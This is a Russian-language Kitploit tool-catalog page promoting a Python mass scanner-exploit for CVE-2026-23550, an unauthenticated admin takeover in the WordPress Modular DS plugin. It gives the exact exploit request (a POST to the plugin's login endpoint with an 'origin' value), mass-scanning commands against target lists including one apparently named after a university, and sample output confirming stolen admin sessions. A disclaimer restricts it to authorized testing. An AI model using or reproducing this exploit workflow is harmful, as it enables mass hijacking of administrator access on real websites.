Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mass-CVE-2026-23550-Exploit — Многопоточный сканер на Python для CVE-2026-23550, обнаруживающий неавторизованный захват администратора в плагине WordPress Modular DS с полной проверкой wp-admin. | Kitploit
Инструменты/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

Многопоточный сканер на Python для CVE-2026-23550, обнаруживающий неавторизованный захват администратора в плагине WordPress Modular DS с полной проверкой wp-admin.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
26 месяцев назадЕщё не проверено

🔥 CVE-2026-23550 Modular DS Scanner

Многопоточный сканер на Python для уязвимости CVE-2026-23550 (CVSS 10.0) в плагине WordPress Modular DS версии ≤2.5.1, затрагивающей более 40 000 сайтов. Обнаруживает неаутентифицированный захват администратора через обход getLogin() с полной проверкой доступа к wp-admin. Возможности ✨

root@kitploit:~
🔥 Полное обнаружение доступа администратора (cookies + проверка wp-admin)

⚡ Многопоточность (до 50+ одновременных целей)

📊 Анимированный индикатор выполнения с rich

🎨 Цветная сводная таблица

💾 Автосохранение уязвимых целей в файл

🚀 Готовые к продакшену таймауты и обработка ошибок

Установка 🚀

bash pip3 install requests rich chmod +x modular_ds.py

Использование 📋

bash

Массовое сканирование (50 потоков)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

Разведка для bug bounty

python3 modular_ds.py -l univ-oran1.txt -t 20

По умолчанию (20 потоков, вывод в vulns.txt)

python3 modular_ds.py -l targets.txt

Формат targets.txt:

text https://target1.com http://site2.com

Пропустить комментарии

https://sub.domain.tld

Аргументы Флаг Описание По умолчанию -l, --list Обязательный. Файл с целями (1 URL в строке) - -t, --threads Максимальное количество одновременных потоков 20 -o, --output Файл вывода уязвимых целей vulns.txt Пример вывода 🖥️

text 🔥 CVE-2026-23550 Modular DS Scanner 🔥 Цели: 247 | Потоки: 50 | Вывод: bounty_vulns.txt

⠋ Сканирование Modular DS... 127/247 (51%) ✅ УЯЗВИМО: https://target.com 🔥 ПОЛНЫЙ ДОСТУП АДМИНИСТРАТОРА: target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ Статус │ Цель │ Детали │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 ПОЛНЫЙ │ https://target.com │ 3 cookies │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 уязвимые цели → bounty_vulns.txt

Логика обнаружения 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ Проверка cookie администратора wordpress_logged_in_*
  3. ✅ Проверка доступа к панели /wp-admin/
  4. 💾 Сохранение подтверждённых целей с ПОЛНЫМ ДОСТУПОМ АДМИНИСТРАТОРА

Правовое и этическое использование ⚖️

text ⚠️ СТРОГО ДЛЯ: ✅ Авторизованного пентеста ✅ Программ bug bounty
✅ Лабораторий по исследованию безопасности ✅ Собственной инфраструктуры

❌ НИКОГДА не использовать на неавторизованных целях

Требования 📦

text requests>=2.31.0 rich>=13.0.0

Скачать инструмент